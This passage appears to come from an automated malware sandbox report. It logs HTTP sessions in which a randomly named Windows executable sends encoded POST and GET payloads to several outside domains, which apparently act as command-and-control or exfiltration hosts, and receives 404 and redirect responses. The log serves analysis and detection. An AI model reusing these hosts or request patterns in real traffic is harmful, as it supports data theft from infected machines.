                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.nevsehir-nakliyat.xyz
                                          Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6= [TRUNCATED]
                                          Sep 7, 2024 21:44:18.855437040 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx/1.14.1
                                          Date: Sat, 07 Sep 2024 19:44:18 GMT
                                          Content-Length: 0
                                          Connection: close
                                          X-Rate-Limit-Limit: 5s
                                          X-Rate-Limit-Remaining: 19
                                          X-Rate-Limit-Reset: 2024-09-07T19:44:23.7520817Z


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          8 | 192.168.2.4 | 56237 | 85.159.66.93 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:20.567056894 CEST | 510 | OUT | GET /csz1/?dxWljT6=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.nevsehir-nakliyat.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:44:21.251424074 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx/1.14.1
                                          Date: Sat, 07 Sep 2024 19:44:21 GMT
                                          Content-Length: 0
                                          Connection: close
                                          X-Rate-Limit-Limit: 5s
                                          X-Rate-Limit-Remaining: 19
                                          X-Rate-Limit-Reset: 2024-09-07T19:44:26.1475682Z


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          9 | 192.168.2.4 | 56238 | 18.139.62.226 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:26.722345114 CEST | 782 | OUT | POST /wg84/ HTTP/1.1
                                          Host: www.masteriocp.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.masteriocp.online
                                          Referer: http://www.masteriocp.online/wg84/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=8AsyGU9UOuOI8mfM0SG1k3tk2J6v/pakLVPphUWSLKw0s5KOLxdrdy6yfBx0CeBO3nFPd3HiM5ndjfX7PlAnHNh9LN94F4g0AVv3PZ8xzXfvItRd7Fxpl5lTrupJqNfakP9T5oQ9xmbuPmPVnfLPrh/az1OEFBmuMXPwK2l0FDt4XHrvPNsCfS3FRGZ0gH6/NQ==
                                          Sep 7, 2024 21:44:27.652952909 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:44:27 GMT
                                          Content-Type: text/html
                                          Content-Length: 166
                                          Connection: close
                                          Location: https://www.masteriocp.online/wg84/
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          10 | 192.168.2.4 | 56239 | 18.139.62.226 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:29.276223898 CEST | 802 | OUT | POST /wg84/ HTTP/1.1
                                          Host: www.masteriocp.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.masteriocp.online
                                          Referer: http://www.masteriocp.online/wg84/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8Y0sbCOKwdray6yQhxtduBZ3nJpd27iM5Ddjfn7IWomGdh7f992IYg0AVv3PZpqzTzvIchd5kxovZlU8epJ79fekP885qkTxjfuPjzVnuLO4B/culPYMxCiVUKYV0FsMgYfSB61e8NVNST2MBQAtEH2We6HoWOIGXlxMfmCNtueAu4=
                                          Sep 7, 2024 21:44:30.171544075 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:44:30 GMT
                                          Content-Type: text/html
                                          Content-Length: 166
                                          Connection: close
                                          Location: https://www.masteriocp.online/wg84/
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          11 | 192.168.2.4 | 56240 | 18.139.62.226 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:31.824115992 CEST | 10884 | OUT | POST /wg84/ HTTP/1.1
                                          Host: www.masteriocp.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.masteriocp.online
                                          Referer: http://www.masteriocp.online/wg84/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6= [TRUNCATED]
                                          Sep 7, 2024 21:44:32.744940996 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:44:32 GMT
                                          Content-Type: text/html
                                          Content-Length: 166
                                          Connection: close
                                          Location: https://www.masteriocp.online/wg84/
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          12 | 192.168.2.4 | 56241 | 18.139.62.226 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:34.367403030 CEST | 506 | OUT | GET /wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.masteriocp.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:44:35.273915052 CEST | 511 | IN | HTTP/1.1 301 Moved Permanently
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:44:35 GMT
                                          Content-Type: text/html
                                          Content-Length: 166
                                          Connection: close
                                          Location: https://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=&GtLD=xFGdQ6FH
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          13 | 192.168.2.4 | 56242 | 162.0.213.94 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:40.758582115 CEST | 758 | OUT | POST /09dt/ HTTP/1.1
                                          Host: www.kryto.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.kryto.top
                                          Referer: http://www.kryto.top/09dt/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=mZ3m6Qa3ZY/2FSWLRPpCBVrJ6whn85CzVgIjcQmA6AIBpLAzBd08yUnVXgXsA0YF0tdtzulnSLi3KyU85GZGTZcfyZUPqA4LCCKowp43ujzJ+bxmy1OCW/7I4mSWW6aMICG7mo9ODEDok2H8LFo2bT7oVC1Xi1GXa6lftQFuRVR7Ey4fW1xLVIDSPn8SVsOb3A==
                                          Sep 7, 2024 21:44:41.380681038 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:44:41 GMT
                                          Server: Apache
                                          Content-Length: 16052
                                          Connection: close
                                          Content-Type: text/html
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          14 | 192.168.2.4 | 56243 | 162.0.213.94 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:43.305522919 CEST | 778 | OUT | POST /09dt/ HTTP/1.1
                                          Host: www.kryto.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.kryto.top
                                          Referer: http://www.kryto.top/09dt/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6y8BnJIzAc081UnVdAWmdEYS0shTzsxnSIe3K2Q85xNHTJcd65UJuA4LCCKowp9quibJ+rBmgA6BYf7Xs2SWdaaAICGZmphkDHrokzD8PEo1QT7yYi1DuXSafLZQlDtAPlRoMUpFHEQcHInhSg1mYvzSsAPbUVr26mysSA6SrYBFQos=
                                          Sep 7, 2024 21:44:43.920993090 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:44:43 GMT
                                          Server: Apache
                                          Content-Length: 16052
                                          Connection: close
                                          Content-Type: text/html
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          15 | 192.168.2.4 | 56244 | 162.0.213.94 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:45.869394064 CEST | 10860 | OUT | POST /09dt/ HTTP/1.1
                                          Host: www.kryto.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.kryto.top
                                          Referer: http://www.kryto.top/09dt/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6= [TRUNCATED]
                                          Sep 7, 2024 21:44:46.507515907 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:44:46 GMT
                                          Server: Apache
                                          Content-Length: 16052
                                          Connection: close
                                          Content-Type: text/html
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                          Sep 7, 2024 21:44:46.507540941 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                          Sep 7, 2024 21:44:46.507555008 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                          Sep 7, 2024 21:44:46.508029938 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                          Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                          Sep 7, 2024 21:44:46.508044004 CEST896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                          Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                          Sep 7, 2024 21:44:46.508055925 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                          Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                          Sep 7, 2024 21:44:46.508065939 CEST224INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                          Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.0
                                          Sep 7, 2024 21:44:46.508964062 CEST1236INData Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74
                                          Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
                                          Sep 7, 2024 21:44:46.508980989 CEST224INData Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34
                                          Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
                                          Sep 7, 2024 21:44:46.508991003 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                          Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                          Sep 7, 2024 21:44:46.512506008 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                          Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          16 | 192.168.2.4 | 56245 | 162.0.213.94 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:48.412349939 CEST | 498 | OUT | GET /09dt/?dxWljT6=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.kryto.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:44:49.013868093 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:44:48 GMT
                                          Server: Apache
                                          Content-Length: 16052
                                          Connection: close
                                          Content-Type: text/html; charset=utf-8


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          17 | 192.168.2.4 | 56246 | 3.33.130.190 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:54.592462063 CEST | 788 | OUT | POST /efkd/ HTTP/1.1
                                          Host: www.angelenterprise.biz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.angelenterprise.biz
                                          Referer: http://www.angelenterprise.biz/efkd/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=Fs3+mulucZCgyEMsz2YsIPW/68w3Epny/XZYmNOdPRBbEVDH2jYopE7OBFqiuyWiA9OnDDL3uEtBVXzm3NmelRIaJDmdQxL3CytQJAoq1nTMpLYFnrgIYcC/FC93VNfSZSbPwZ6yDHlYurkj40xYN8ZJxjr5D7Sg2RyCK9tzwsg5I0G89syjjOwd7KH9F3RqOQ==


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          18 | 192.168.2.4 | 56247 | 3.33.130.190 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:57.134924889 CEST | 808 | OUT | POST /efkd/ HTTP/1.1
                                          Host: www.angelenterprise.biz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.angelenterprise.biz
                                          Referer: http://www.angelenterprise.biz/efkd/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPClbE1zHkSYokk7OY1qdgSWTA9KFDHL3uA9BVVrmw+OZkBIURzmfUxL3CytQJBYM1n7MpaoFg/0HR8C+CC93RNebZSbXwbOYDENYurUj4lxbH8ZP+DrsQrXuzz2NKdEU2osoJyXmsdT0xOUumNOJI0sjVaod5tnmjH7Y1I0fLpvTdJM=


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          19 | 192.168.2.4 | 56248 | 3.33.130.190 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:44:59.685391903 CEST | 10890 | OUT | POST /efkd/ HTTP/1.1
                                          Host: www.angelenterprise.biz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
